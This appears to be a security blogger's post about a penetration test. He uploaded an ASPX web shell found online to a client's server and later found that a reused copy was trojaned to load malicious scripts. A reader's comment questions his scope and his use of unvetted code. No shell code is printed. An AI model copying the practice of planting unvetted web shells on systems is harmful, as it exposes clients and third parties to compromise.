Once upon a time, I had a client, which requested for a full BlackBox attack on his networks. One of the IPs I got was a website which had an application I've found a vulnerability which allowed me to upload files to the remote server.
Long story short, I've uploaded a shell for aspx files, simply by going to google and googling : "aspx shell" and the first result was actually what I needed to save my time and not writing my own shell.
Great news... why am I telling you this you probably ask yourself, that's why, I had a funny incident few weeks later. I've hacked to another website and used the same shell again, this time, I just googled it and didn't validate the code. But when I've entered my remote page at the victim's site (client), I've seen my browser goes to different websites which he can not resolve, that's why I immediately suspected I got a browser-malware, or any other process that injected code to my browser.
One thing I want to clarify, I don't use Anti-Virus, simply, because I don't believe in them. If you've ever tried it, you know it's not hard to bypass anti-virus so he won't recognize your piece of code. I monitor my computer like a lunatic, I check if my SSDT has hooks almost every-day :). I follow on which dlls are on each process, checks services, autoruns verify, etc etc etc. like I said, lunatic :).
That's why it was weird to me that I've seen the browser goes to weird places in wireshark, including some malicious sites. It was weird since I was only in one page, which I know what's the content of (since I've uploaded it to the server) and I don't do anything else which requires internet connection.
Immediately I've started to Debug my firefox, look for suspicious strings in memory, check every single dll it had loaded, checked for arp poisoning if someone is injecting me any FRAME, absolutely NOTHING!
I've started to think that my firefox came trojaned, when I've seen that in one of the scans the anti-viruses I got to check if I got something popular, saw an infected file at the SOURCE-CODE of firefox, which I've downloaded from mozilla. It was extreamly weird, too bad I've forgotten to turn of the automatic delete (since it had deleted, I couldn't examine it) - so I was sure at that point that the same virus that attacked me, had searched for the code, and put malicious code in Firefox source-code as-well! (and I actually was happy to see such a nice malicious code way of spreading :)) - but that's probably a false positive).
(screenshot of BitDefender result's).By the way, that source-code bz2 file from mozilla, I havn't actually installed it, but used to check some sources where I've thought there's a little bug. Luckily it's open-source, right?
Anyways, I couldn't find anything else on my computer, no more weird sniffing in wire-shark, and almost decided to format my computer, when I've decided that it only appeared on that page.
Well.. I've entered to the same page, again, and viewed the source, directly it appeared to me : THE SHELL-CODE WAS TROJANED. The malicious sites that my browser tried to go to were pages which were reportedly drop-off for malicious software :
Google Safe-Browsing report for omochacha[dot]com
Those lines appeared in the trojaned source-code :
quite obvious, right? indeed. I've tried to download those js files for analysis, but couldn't download them (404). When I've seen the weird errors, that means the JS download from the script had worked, that's why it tried to contact bunch of other sites like the one a report has been posted above. I've tried to look if the shell-code had arrived trojaned or became infected on my computer and seen a cached google page which indicates I've probably googled it and got it trojaned in the 2nd time I've downloaded it. GOOGLE CACHE Result for the same shell + some "EXTRA SURPRISES" I will try to see if there's any cache for it, and will try to analyze it. I will be going to SANS conference in London this Friday, so I won't have lots of time blogging, but till next time, cheers :)
Posts
1 comment:
Based on the "vhosts" in the path of the first image, I wonder if you may have exceeded your scope of permission in testing that system. While it's certainly possible that your client is an ISP or hosts several virt hosts of their own in a meticulous
sort of file structure, my suspicion is that the physical server may belong to a different company. You state that you were able to obtain Domain Administrator access, was the domain in question that of your client?
From a professional stand point, I would strongly discourage running non-vetted code on your client's equipment. Explaining why a pen test resulted in an actual information breach to an unknown third-party or a loss of data is not a conversation I would like to have.
Post a Comment